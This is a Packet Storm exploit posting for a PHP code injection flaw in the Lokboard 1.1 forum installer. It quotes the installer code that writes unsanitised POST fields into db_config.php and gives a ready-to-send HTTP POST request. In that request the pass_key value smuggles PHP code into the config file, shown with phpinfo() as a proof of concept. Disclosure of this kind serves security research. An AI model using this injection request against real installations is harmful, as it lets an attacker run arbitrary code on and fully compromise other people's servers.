exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Lokboard 1.1 PHP Code Injection

Lokboard 1.1 PHP Code Injection
Posted Jun 10, 2013
Authored by CWH Underground

Lokboard version 1.1 suffers from a remote PHP code injection vulnerability.

tags | exploit, remote, php
SHA-256 | d657c10dae83eb0c200a7f8f29e9521a0a4b076a65a941d86d5b104b56ffda5e

Lokboard 1.1 PHP Code Injection

Change Mirror Download
# Exploit Title   : Lokboard PHP Code Injection
# Date : 9 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://lokboard.net/
# Software Link : lokboard.net/downloads/lokboard_1_1_0.zip
# Version : 1.1
# Tested on : Window and Linux

,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'

####################################
VULNERABILITY: PHP CODE INJECTION
####################################

/install/index_4.php (LINE: 21-45)

-----------------------------------------------------------------------------
LINE 21-45:

$config_file = '<?php
/*******************
| lokboard forum software
| powered by lokboard 1.0
*******************/

if(!defined("access")){ include("errors/access.html"); exit(); }

/*******************
| The following settings are related
| to the MySQL side of the application
*******************/

$DB_NAME = "' . $_POST["name"] . '"; // Your database name
$DB_HOST = "' . $_POST["host"] . '"; // Your database host
$DB_USER = "' . $_POST["user"] . '"; // Your database username
$DB_PASS = "' . $_POST["pass"] . '"; // Your database password

// Please change the following key to a secure phrase - do not modify after board installation
$config["password_key"] = "' . $_POST["pass_key"] . '";
?>
';

$write_config = fopen("../lokboard/db_config.php", "w");
fwrite($write_config, $config_file);
-----------------------------------------------------------------------------


#####################################################
DESCRIPTION
#####################################################

An attacker might write to arbitrary files or inject arbitrary code into a file with this vulnerability.
User tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file.
An attacker can try to write arbitrary PHP code in a PHP file allowing to fully compromise the server.

This CMS allow attacker to insert PHP code into config.php with 1234";phpinfo();//

/lokboard/db_config.php
-----------------------------------------------------------------------------
$DB_NAME = "lokboard"; // Your database name
$DB_HOST = "localhost"; // Your database host
$DB_USER = "root"; // Your database username
$DB_PASS = "toor"; // Your database password

// Please change the following key to a secure phrase - do not modify after board installation
$config["password_key"] = "1234";phpinfo();//";
-----------------------------------------------------------------------------

#####################################################
EXPLOIT
#####################################################


POST /lokboard/install/index_4.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lokboard/install/index_3.php?error=1
Cookie: lang=; PHPSESSID=g4j89f6110r4hpl3bkecfpc7c1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
host=localhost&user=root&pass=toor&name=lokboard&pass_key=1234";phpinfo();//

################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    9 Files
  • 30
    Nov 30th
    21 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close